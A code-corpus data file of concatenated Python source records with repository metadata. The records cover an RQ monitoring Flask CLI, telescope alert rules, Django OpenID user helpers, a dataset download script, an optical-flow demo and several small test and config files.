result3 = layer(V, adjs)
assert np.allclose(result, result3)
def test_hinge_loss(self):
"""Test invoking HingeLoss in eager mode."""
with context.eager_mode():
n_labels = 1
n_logits = 1
logits = np.random.rand(n_logits).astype(np.float32)
labels = np.random.rand(n_labels).astype(np.float32)
result = layers.HingeLoss()(labels, logits)
assert result.shape == (n_labels,)
| 37.264995 | 94 | 0.654747 | 4,572 | 34,172 | 4.768591 | 0.071085 | 0.052426 | 0.052289 | 0.043345 | 0.760618 | 0.712503 | 0.676131 | 0.639116 | 0.612054 | 0.571874 | 0 | 0.032992 | 0.231856 | 34,172 | 916 | 95 | 37.305677 | 0.797592 | 0.166803 | 0 | 0.538922 | 0 | 0 | 0.000427 | 0 | 0 | 0 | 0 | 0.001092 | 0.208084 | 1 | 0.094311 | false | 0 | 0.013473 | 0 | 0.109281 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4f8a7e27a6b1a8b93095262140e88ebc073c0f4 | 790 | py | Python | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | # Solution of;
# Project Euler Problem 49: Prime permutations
# https://projecteuler.net/problem=49
#
# The arithmetic sequence, 1487, 4817, 8147, in which each of the terms
# increases by 3330, is unusual in two ways: (i) each of the three terms are
# prime, and, (ii) each of the 4-digit numbers are permutations of one
# another. There are no arithmetic sequences made up of three 1-, 2-, or
# 3-digit primes, exhibiting this property, but there is one other 4-digit
# increasing sequence. What 12-digit number do you form by concatenating the
# three terms in this sequence?
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
pass
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 49
timed.caller(dummy, n, i, prob_id)
| 30.384615 | 77 | 0.711392 | 127 | 790 | 4.346457 | 0.622047 | 0.032609 | 0.048913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066456 | 0.2 | 790 | 25 | 78 | 31.6 | 0.806962 | 0.775949 | 0 | 0 | 0 | 0 | 0.04908 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.125 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4f93be850b5b4fb3f0bf11c18b271c4dd267dcc | 8,879 | py | Python | rqmonitor/cli.py | trodery/rqmonitor | 65831337591afe6887dec2dbb37a28d84f881f35 | [
"Apache-2.0"
] | null | null | null | rqmonitor/cli.py | trodery/rqmonitor | 65831337591afe6887dec2dbb37a28d84f881f35 | [
"Apache-2.0"
] | null | null | null | rqmonitor/cli.py | trodery/rqmonitor | 65831337591afe6887dec2dbb37a28d84f881f35 | [
"Apache-2.0"
] | null | null | null | """
This reference script has been taken from rq-dashboard with some modifications
"""
import importlib
import logging
import os
import sys
from urllib.parse import quote as urlquote, urlunparse
from redis.connection import (URL_QUERY_ARGUMENT_PARSERS,
UnixDomainSocketConnection,
SSLConnection)
from urllib.parse import urlparse, parse_qs, unquote
import click
from flask import Flask, Response, request
from rqmonitor.defaults import RQ_MONITOR_REDIS_URL, RQ_MONITOR_REFRESH_INTERVAL
from rqmonitor.version import VERSION
from rqmonitor.bp import monitor_blueprint
logger = logging.getLogger("werkzeug")
def add_basic_auth(blueprint, username, password, realm="RQ Monitor"):
"""Add HTTP Basic Auth to a blueprint.
Note this is only for casual use!
"""
@blueprint.before_request
def basic_http_auth(*args, **kwargs):
auth = request.authorization
if auth is None or auth.password != password or auth.username != username:
return Response(
"Please login",
401,
{"WWW-Authenticate": 'Basic realm="{}"'.format(realm)},
)
def create_app_with_blueprint(config=None, username=None, password=None,
url_prefix='', blueprint=monitor_blueprint):
"""Return Flask app with default configuration and registered blueprint."""
app = Flask(__name__)
# Override with any settings in config file, if given.
if config:
app.config.from_object(importlib.import_module(config))
# Override from a configuration file in the env variable, if present.
if "RQ_MONITOR_SETTINGS" in os.environ:
app.config.from_envvar("RQ_MONITOR_SETTINGS")
# Optionally add basic auth to blueprint and register with app.
if username:
add_basic_auth(blueprint, username, password)
app.register_blueprint(blueprint, url_prefix=url_prefix)
return app
def check_url(url, decode_components=False):
"""
Taken from redis-py for basic check before passing URL to redis-py
Kept here to show error before launching app
For example::
redis://[[username]:[password]]@localhost:6379/0
rediss://[[username]:[password]]@localhost:6379/0
unix://[[username]:[password]]@/path/to/socket.sock?db=0
Three URL schemes are supported:
- ```redis://``
<https://www.iana.org/assignments/uri-schemes/prov/redis>`_ creates a
normal TCP socket connection
- ```rediss://``
<https://www.iana.org/assignments/uri-schemes/prov/rediss>`_ creates
a SSL wrapped TCP socket connection
- ``unix://`` creates a Unix Domain Socket connection
There are several ways to specify a database number. The parse function
will return the first specified option:
1. A ``db`` querystring option, e.g. redis://localhost?db=0
2. If using the redis:// scheme, the path argument of the url, e.g.
redis://localhost/0
3. The ``db`` argument to this function.
If none of these options are specified, db=0 is used.
The ``decode_components`` argument allows this function to work with
percent-encoded URLs. If this argument is set to ``True`` all ``%xx``
escapes will be replaced by their single-character equivalents after
the URL has been parsed. This only applies to the ``hostname``,
``path``, ``username`` and ``password`` components.
Any additional querystring arguments and keyword arguments will be
passed along to the ConnectionPool class's initializer. The querystring
arguments ``socket_connect_timeout`` and ``socket_timeout`` if supplied
are parsed as float values. The arguments ``socket_keepalive`` and
``retry_on_timeout`` are parsed to boolean values that accept
True/False, Yes/No values to indicate state. Invalid types cause a
``UserWarning`` to be raised. In the case of conflicting arguments,
querystring arguments always win.
"""
url = urlparse(url)
url_options = {}
for name, value in (parse_qs(url.query)).items():
if value and len(value) > 0:
parser = URL_QUERY_ARGUMENT_PARSERS.get(name)
if parser:
try:
url_options[name] = parser(value[0])
except (TypeError, ValueError):
logger.warning(UserWarning(
"Invalid value for `%s` in connection URL." % name
))
else:
url_options[name] = value[0]
if decode_components:
username = unquote(url.username) if url.username else None
password = unquote(url.password) if url.password else None
path = unquote(url.path) if url.path else None
hostname = unquote(url.hostname) if url.hostname else None
else:
username = url.username or None
password = url.password or None
path = url.path
hostname = url.hostname
# We only support redis://, rediss:// and unix:// schemes.
if url.scheme == 'unix':
url_options.update({
'username': username,
'password': password,
'path': path,
'connection_class': UnixDomainSocketConnection,
})
elif url.scheme in ('redis', 'rediss'):
url_options.update({
'host': hostname,
'port': int(url.port or 6379),
'username': username,
'password': password,
})
# If there's a path argument, use it as the db argument if a
# querystring value wasn't specified
if 'db' not in url_options and path:
try:
url_options['db'] = int(path.replace('/', ''))
except (AttributeError, ValueError):
pass
if url.scheme == 'rediss':
url_options['connection_class'] = SSLConnection
else:
valid_schemes = ', '.join(('redis://', 'rediss://', 'unix://'))
raise ValueError('Redis URL must specify one of the following '
'schemes (%s)' % valid_schemes)
return True
@click.command()
@click.option(
"-b",
"--bind",
default="0.0.0.0",
help="IP or hostname on which to bind HTTP server",
)
@click.option(
"-p", "--port", default=8899, type=int, help="Port on which to bind HTTP server"
)
@click.option(
"--url-prefix", default="", help="URL prefix e.g. for use behind a reverse proxy"
)
@click.option(
"--username", default=None, help="HTTP Basic Auth username (not used if not set)"
)
@click.option("--password", default=None, help="HTTP Basic Auth password")
@click.option(
"-c",
"--config",
default=None,
help="Configuration file (Python module on search path)",
)
@click.option(
"-u",
"--redis-url",
default=[RQ_MONITOR_REDIS_URL],
multiple=True,
help="Redis URL. Can be specified multiple times. Default: redis://127.0.0.1:6379",
)
@click.option(
"--refresh-interval",
"--interval",
"refresh_interval",
default=RQ_MONITOR_REFRESH_INTERVAL,
type=int,
help="Refresh interval in ms",
)
@click.option(
"--extra-path",
default=".",
multiple=True,
help="Append specified directories to sys.path",
)
@click.option("--debug/--normal", default=False, help="Enter DEBUG mode")
@click.option(
"-v", "--verbose", is_flag=True, default=False, help="Enable verbose logging"
)
def run(
bind,
port,
url_prefix,
username,
password,
config,
redis_url,
refresh_interval,
extra_path,
debug,
verbose,
):
"""Run the RQ Monitor Flask server.
All configuration can be set on the command line or through environment
variables of the form RQ_MONITOR_*. For example RQ_MONITOR_USERNAME.
A subset of the configuration (the configuration parameters used by the
underlying flask blueprint) can also be provided in a Python module
referenced using --config, or with a .cfg file referenced by the
RQ_MONITOR_SETTINGS environment variable.
"""
if extra_path:
sys.path += list(extra_path)
click.echo("RQ Monitor version {}".format(VERSION))
app = create_app_with_blueprint(config, username, password, url_prefix, monitor_blueprint)
app.config["RQ_MONITOR_REDIS_URL"] = redis_url
app.config["RQ_MONITOR_REFRESH_INTERVAL"] = refresh_interval
# Conditionally disable Flask console messages
# See: https://stackoverflow.com/questions/14888799
if verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.ERROR)
logger.error(" * Running on {}:{}".format(bind, port))
for url in redis_url:
check_url(url)
app.run(host=bind, port=port, debug=debug)
def main():
run(auto_envvar_prefix="RQ_MONITOR")
if __name__ == '__main__':
main() | 32.52381 | 94 | 0.64692 | 1,108 | 8,879 | 5.083935 | 0.278881 | 0.023966 | 0.007456 | 0.009054 | 0.069945 | 0.049352 | 0.026274 | 0.026274 | 0 | 0 | 0 | 0.007909 | 0.245298 | 8,879 | 273 | 95 | 32.52381 | 0.832712 | 0.328077 | 0 | 0.150602 | 0 | 0.006024 | 0.175335 | 0.008523 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036145 | false | 0.072289 | 0.078313 | 0 | 0.13253 | 0.048193 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
f209fda8f0cfe43f72b6eb3a30447ef4d992f64f | 6,764 | py | Python | python/alertsActor/rules/dangerKey.py | sdss/twistedAlertsActor | 857588f6da39b7716263f8bd8e3f1be8bb4ce0f7 | [
"BSD-3-Clause"
] | null | null | null | python/alertsActor/rules/dangerKey.py | sdss/twistedAlertsActor | 857588f6da39b7716263f8bd8e3f1be8bb4ce0f7 | [
"BSD-3-Clause"
] | null | null | null | python/alertsActor/rules/dangerKey.py | sdss/twistedAlertsActor | 857588f6da39b7716263f8bd8e3f1be8bb4ce0f7 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
#
# dangerKey.py
#
# Created by John Donor on 10 April 2019
import re, time
from yaml import YAMLObject
from alertsActor import log
class diskCheck(YAMLObject):
"""evaluate a disk keyword
"""
def __init__(self):
pass
def __call__(self, keyState):
"""The keyval is an enum ('Ok','Warning','Serious','Critical')
and the amount of free space (GB)
"""
keyval = keyState.keyword
if (keyval[0]).upper() == 'OK':
return "ok"
elif (keyval[0]).upper() == 'WARNING':
return "warn"
elif (keyval[0]).upper() == 'SERIOUS':
return "serious"
elif (keyval[0]).upper() == 'CRITICAL':
return "critical"
else:
return "info"
class doNothing(object):
"""camcheck alerts can't check themselves
dummy class to facilitate that
"""
def __init__(self):
pass
def __call__(self, keyState):
return keyState.severity
class camCheck(YAMLObject):
"""evaluate a camCheck alert
"""
def __init__(self):
# NEVER GETS CALLED!!!! -_-
pass
def generateCamCheckAlert(self, key, severity):
inst = key[:3]
side = key[3]
key = "camCheck." + key
instruments = ["boss"]
# most keywords will be SP[12][RB]
# check if they are and assign appropriate instruments
if inst in ["SP1", "SP2"]:
instruments.append("boss.{}".format(inst))
if side in ["R", "B"]:
instruments.append("boss.{}.{}".format(inst, side))
if severity in ["critical", "serious"]:
selfClear = False
addresses = self.emailAddresses
else:
selfClear = True
addresses = None
if key not in self.triggered:
self.triggered.append(key)
if key not in self.alertsActor.monitoring:
dumbCheck = doNothing()
self.alertsActor.addKey(key, severity=severity, checkAfter=120,
selfClear=selfClear, checker=dumbCheck,
keyword="'Reported by camCheck'",
instruments=instruments, emailAddresses=addresses,
emailDelay=0)
if self.alertsActor.monitoring[key].active:
self.alertsActor.monitoring[key].stampTime()
else:
self.alertsActor.monitoring[key].setActive(severity)
def __call__(self, keyState):
keyval = keyState.keyword
if self.alertsActor is None:
print("setting alertsActor for camCheck!!")
self.alertsActor = keyState.alertsActorReference
# do this only once hopefully
for i in ["boss.SP1", "boss.SP2", "boss.SP1.R", "boss.SP2.R",
"boss.SP1.B", "boss.SP2.B"]:
self.alertsActor.instrumentDown[i] = False
# print("CAMCHECK, len {}, type {}, key: {}".format(len(keyval), type(keyval), keyval))
log.info('CAMCHECK reported {}'.format(keyval))
if type(keyval) == str:
# could possibly try to fix this in hubModel casts, but easier here
keyval = [keyval]
if len(keyval) == 1 and keyval[0] == "None": # this is a bug somewhere upstream
keyval = []
for k in keyval:
if re.search(r"SP[12][RB][0-3]?CCDTemp", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"SP[12]SecondaryDewarPress", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"SP[12](DAQ|Mech|Micro)NotTalking", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"DACS_SET", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"SP[12]LN2Fill", k):
self.generateCamCheckAlert(k, "serious")
elif re.search(r"SP[12](Exec|Phase)Boot", k):
self.generateCamCheckAlert(k, "serious")
else:
self.generateCamCheckAlert(k, "warn")
for k in self.triggered:
if k.split(".")[-1] not in keyval: # b/c we know its camCheck already
self.alertsActor.monitoring[k].severity = "ok"
# now it can check itself and find out its cool
# and then decide to disappear if its acknowledged, etc etc
self.alertsActor.monitoring[k].checkKey()
self.triggered.remove(k)
# never flag camCheck, always monitored keys
return "ok"
class heartbeatCheck(YAMLObject):
"""check a heartbeat.
"""
def __init__(self):
pass
def __call__(self, keyState):
if time.time() - keyState.lastalive < keyState.checkAfter:
return "ok"
elif time.time() - keyState.lastalive > 5*keyState.checkAfter:
return "critical"
else:
return keyState.defaultSeverity
class above(YAMLObject):
"""literally: is the value too high
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword > keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class below(YAMLObject):
"""literally: is the value too low
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword < keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class neq(YAMLObject):
"""literally: is the value too low
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword != keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class inList(YAMLObject):
"""is any value in the list "True", e.g. flagged
"""
def __init__(self):
pass
def __call__(self, keyState):
if [k for k in keyState.keyword if k]:
return keyState.defaultSeverity
else:
return "ok"
class firstElem(YAMLObject):
"""is any value in the list "True", e.g. flagged
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword[0] == keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class default(object):
"""check equality to a dangerval
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword == keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
| 29.797357 | 95 | 0.563128 | 725 | 6,764 | 5.14069 | 0.286897 | 0.018782 | 0.029514 | 0.050979 | 0.356587 | 0.310706 | 0.297558 | 0.285216 | 0.266971 | 0.227529 | 0 | 0.009864 | 0.325547 | 6,764 | 226 | 96 | 29.929204 | 0.807102 | 0.161295 | 0 | 0.458904 | 0 | 0 | 0.078607 | 0.018306 | 0 | 0 | 0 | 0 | 0 | 1 | 0.143836 | false | 0.068493 | 0.020548 | 0.006849 | 0.383562 | 0.006849 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
f20a9c6a0a0f41308a9f256ea4ec3d2997af5cd5 | 6,388 | py | Python | eruditio/shared_apps/django_community/utils.py | genghisu/eruditio | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | [
"BSD-3-Clause",
"MIT"
] | null | null | null | eruditio/shared_apps/django_community/utils.py | genghisu/eruditio | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | [
"BSD-3-Clause",
"MIT"
] | null | null | null | eruditio/shared_apps/django_community/utils.py | genghisu/eruditio | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | [
"BSD-3-Clause",
"MIT"
] | null | null | null | """
Various utilities functions used by django_community and
other apps to perform authentication related tasks.
"""
import hashlib, re
import django.forms as forms
from django.core.exceptions import ObjectDoesNotExist
from django.forms import ValidationError
import django.http as http
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.auth import logout as auth_logout
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
from django_community.models import UserOpenID, UserProfile
def openid_logout(request):
"""
Clears session which effectively logs out the current
OpenId user.
"""
request.session.flush()
def handle_logout(request):
"""
Log out.
"""
auth_logout(request)
def get_logged_user(request):
"""
Returns the current user who is logged in, checks for openid user first,
then for regular user, return None if no user is currently logged in
"""
if settings.OPENID_ENABLED and hasattr(request, 'openid'):
user = UserOpenID.objects.get_for_openid(request, request.openid)
if not user:
user = request.user
return user
def handle_login(request, data):
"""
Logs the user in based on form data from django_community.LoginForm.
"""
user = authenticate(username = data.get('username', None),
password = data.get('password', None))
user_object = User.objects.get(username = data.get('username', None))
if user is not None:
login(request, user)
return user
def handle_signup(request, data):
"""
Signs a user up based on form data from django_community.SignupForm.
"""
from django.contrib.auth.models import get_hexdigest
username = data.get('username', None)
email = data.get('email', None)
password = data.get('password', None)
try:
user = User.objects.get(username = username, email = email)
except ObjectDoesNotExist:
user = User(username = username, email = email)
user.save()
user.set_password(password)
user_profile = UserProfile.objects.get_user_profile(user)
user = authenticate(username = username, password = password)
login(request, user)
return user
def get_or_create_from_openid(openid):
"""
Returns an User with the given openid or
creates a new user and associates openid with that user.
"""
try:
user = User.objects.get(username = openid)
except ObjectDoesNotExist:
password = hashlib.sha256(openid).hexdigest()
user = User(username = openid, email = '', password = password)
user.save()
user.display_name = "%s_%s" % ('user', str(user.id))
user.save()
return user
def generate_random_user_name():
"""
Generates a random user name user_{user_id}_{salt}
to be used for creating new users.
"""
import random
current_users = User.objects.all().order_by('-id')
if current_users:
next_id = current_users[0].id + 1
else:
next_id = 1
random_salt = random.randint(1, 5000)
return 'user_%s_%s' % (str(next_id), str(random_salt))
def create_user_from_openid(request, openid):
"""
Creates a new User object associated with the given
openid.
"""
from django_community.config import OPENID_FIELD_MAPPING
from django_utils.request_helpers import get_ip
username = generate_random_user_name()
profile_attributes = {}
for attribute in OPENID_FIELD_MAPPING.keys():
mapped_attribute = OPENID_FIELD_MAPPING[attribute]
if openid.sreg and openid.sreg.get(attribute, ''):
profile_attributes[mapped_attribute] = openid.sreg.get(attribute, '')
new_user = User(username = username)
new_user.save()
new_openid = UserOpenID(openid = openid.openid, user = new_user)
new_openid.save()
new_user_profile = UserProfile.objects.get_user_profile(new_user)
for filled_attribute in profile_attributes.keys():
setattr(new_user, filled_attribute, profile_attributes[filled_attribute])
new_user_profile.save()
return new_user
def get_anon_user(request):
"""
Returns an anonmymous user corresponding to this IP address if one exists.
Else create an anonymous user and return it.
"""
try:
anon_user = User.objects.get(username = generate_anon_user_name(request))
except ObjectDoesNotExist:
anon_user = create_anon_user(request)
return anon_user
def create_anon_user(request):
"""
Creates a new anonymous user based on the ip provided by the request
object.
"""
anon_user_name = generate_anon_user_name(request)
anon_user = User(username = anon_user_name)
anon_user.save()
user_profile = UserProfile(user = anon_user, display_name = 'anonymous')
user_profile.save()
return anon_user
def generate_anon_user_name(request):
"""
Generate an anonymous user name based on and ip address.
"""
from django_utils.request_helpers import get_ip
ip = get_ip(request)
return "anon_user_%s" % (str(ip))
def is_anon_user(user):
"""
Determine if an user is anonymous or not.
"""
return user.username[0:10] == 'anon_user_'
def is_random(name):
"""
Determine if a user has a randomly generated display name.
"""
if len(name.split('_')) and name.startswith('user'):
return True
else:
return False
def process_ax_data(user, ax_data):
"""
Process OpenID AX data.
"""
import django_openidconsumer.config
emails = ax_data.get(django_openidconsumer.config.URI_GROUPS.get('email').get('type_uri', ''), '')
display_names = ax_data.get(django_openidconsumer.config.URI_GROUPS.get('alias').get('type_uri', ''), '')
if emails and not user.email.strip():
user.email = emails[0]
user.save()
if not user.profile.display_name.strip() or is_random(user.profile.display_name):
if display_names:
user.profile.display_name = display_names[0]
elif emails:
user.profile.display_name = emails[0].split('@')[0]
user.profile.save() | 32.262626 | 109 | 0.681277 | 825 | 6,388 | 5.100606 | 0.207273 | 0.034221 | 0.02424 | 0.019962 | 0.201046 | 0.144487 | 0.077947 | 0.04135 | 0.022338 | 0 | 0 | 0.003627 | 0.223075 | 6,388 | 198 | 110 | 32.262626 | 0.844247 | 0.170319 | 0 | 0.184874 | 0 | 0 | 0.026904 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.05042 | 0.159664 | 0 | 0.378151 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
f20f3b3cdb095ea301a3efa6ea5c8c922e9be8db | 640 | py | Python | ghiaseddin/scripts/download-dataset-lfw10.py | yassersouri/ghiaseddin | a575f2375729e7586ae7c682f8505dbb7619e622 | [
"MIT"
] | 44 | 2016-09-07T11:04:10.000Z | 2022-03-14T07:38:17.000Z | ghiaseddin/scripts/download-dataset-lfw10.py | yassersouri/ghiaseddin | a575f2375729e7586ae7c682f8505dbb7619e622 | [
"MIT"
] | 1 | 2016-09-06T23:33:54.000Z | 2016-09-06T23:33:54.000Z | ghiaseddin/scripts/download-dataset-lfw10.py | yassersouri/ghiaseddin | a575f2375729e7586ae7c682f8505dbb7619e622 | [
"MIT"
] | 13 | 2016-09-17T15:31:06.000Z | 2021-05-22T07:28:46.000Z | from subprocess import call
import os
import sys
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
import settings
data_zip_path = os.path.join(settings.lfw10_root, "LFW10.zip")
data_url = "http://cvit.iiit.ac.in/images/Projects/relativeParts/LFW10.zip"
# Downloading the data zip and extracting it
call(["wget",
"--continue", # do not download things again
"--tries=0", # try many times to finish the download
"--output-document=%s" % data_zip_path, # save it to the appropriate place
data_url])
call(["unzip -d %s %s" % (settings.lfw10_root, data_zip_path)], shell=True)
| 33.684211 | 85 | 0.714063 | 99 | 640 | 4.474747 | 0.565657 | 0.054176 | 0.074492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016484 | 0.146875 | 640 | 18 | 86 | 35.555556 | 0.794872 | 0.221875 | 0 | 0 | 0 | 0 | 0.259635 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.307692 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
f218482525c6f07411100d66a18c105ea0a2d6c8 | 926 | py | Python | samples/noxfile_config.py | ikuleshov/python-analytics-admin | f3d6fa78292878e7470806be0c116c6ca589eec5 | [
"Apache-2.0"
] | null | null | null | samples/noxfile_config.py | ikuleshov/python-analytics-admin | f3d6fa78292878e7470806be0c116c6ca589eec5 | [
"Apache-2.0"
] | null | null | null | samples/noxfile_config.py | ikuleshov/python-analytics-admin | f3d6fa78292878e7470806be0c116c6ca589eec5 | [
"Apache-2.0"
] | null | null | null | TEST_CONFIG_OVERRIDE = {
# An envvar key for determining the project id to use. Change it
# to 'BUILD_SPECIFIC_GCLOUD_PROJECT' if you want to opt in using a
# build specific Cloud project. You can also use your own string
# to use your own Cloud project.
"gcloud_project_env": "BUILD_SPECIFIC_GCLOUD_PROJECT",
# 'gcloud_project_env': 'BUILD_SPECIFIC_GCLOUD_PROJECT',
# A dictionary you want to inject into your test. Don't put any
# secrets here. These values will override predefined values.
"envs": {
"GA_TEST_PROPERTY_ID": "276206997",
"GA_TEST_ACCOUNT_ID": "199820965",
"GA_TEST_USER_LINK_ID": "103401743041912607932",
"GA_TEST_PROPERTY_USER_LINK_ID": "105231969274497648555",
"GA_TEST_ANDROID_APP_DATA_STREAM_ID": "2828100949",
"GA_TEST_IOS_APP_DATA_STREAM_ID": "2828089289",
"GA_TEST_WEB_DATA_STREAM_ID": "2828068992",
},
}
| 46.3 | 70 | 0.712743 | 127 | 926 | 4.826772 | 0.503937 | 0.068516 | 0.092985 | 0.127243 | 0.14845 | 0.14845 | 0.14845 | 0.14845 | 0 | 0 | 0 | 0.121786 | 0.201944 | 926 | 19 | 71 | 48.736842 | 0.707713 | 0.429806 | 0 | 0 | 0 | 0 | 0.609615 | 0.365385 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1ef2ba31fbb403bcb4ce6125ac2b8a6fd53306d0 | 527 | py | Python | src/tests/flow.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 5 | 2019-11-11T10:01:52.000Z | 2020-12-08T11:56:33.000Z | src/tests/flow.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 1 | 2020-06-13T06:39:44.000Z | 2020-06-13T06:39:44.000Z | src/tests/flow.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 1 | 2020-07-16T23:07:28.000Z | 2020-07-16T23:07:28.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cv2
import imageio
import numpy as np
from tar.miscellaneous import convert_flow_to_color
prev = imageio.imread("ressources/1_1.png")
prev = cv2.cvtColor(prev, cv2.COLOR_RGB2GRAY)
curr = imageio.imread("ressources/1_2.png")
curr = cv2.cvtColor(curr, cv2.COLOR_RGB2GRAY)
flow = cv2.calcOpticalFlowFarneback(prev, curr, None, 0.9, 15, 20, 100, 10, 1.5, cv2.OPTFLOW_FARNEBACK_GAUSSIAN)
rgb = convert_flow_to_color(flow)
imageio.imsave("/Users/sele/Desktop/test.png", rgb)
| 29.277778 | 112 | 0.759013 | 83 | 527 | 4.674699 | 0.566265 | 0.056701 | 0.06701 | 0.092784 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059197 | 0.102467 | 527 | 17 | 113 | 31 | 0.761099 | 0.081594 | 0 | 0 | 0 | 0 | 0.13278 | 0.058091 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
1ef930c42df2781ea2ef6709774093b794cfc83e | 3,081 | py | Python | testing/tests/registers.py | Wynjones1/gbvhdl | 46cef04cef308967ea4764eeeaf7d611dc783ae4 | [
"MIT"
] | null | null | null | testing/tests/registers.py | Wynjones1/gbvhdl | 46cef04cef308967ea4764eeeaf7d611dc783ae4 | [
"MIT"
] | null | null | null | testing/tests/registers.py | Wynjones1/gbvhdl | 46cef04cef308967ea4764eeeaf7d611dc783ae4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2.7
from common import *
from random import randint, choice
registers = {\
"a" : int("0000", 2),
"f" : int("0001", 2),
"b" : int("0010", 2),
"c" : int("0011", 2),
"d" : int("0100", 2),
"e" : int("0101", 2),
"h" : int("0110", 2),
"l" : int("0111", 2),
"af" : int("1000", 2),
"bc" : int("1001", 2),
"de" : int("1010", 2),
"hl" : int("1011", 2),
"sp" : int("1100", 2),
"pc" : int("1101", 2),
}
def output_line(fp, reg_write, reg_read, we,
write_data, read_data, reg_w_name, reg_r_name):
fp.write("%s %s %s %s %s #%s %s\n" %
(to_bin(reg_write, 4),
to_bin(reg_read, 4),
"1" if we else "0",
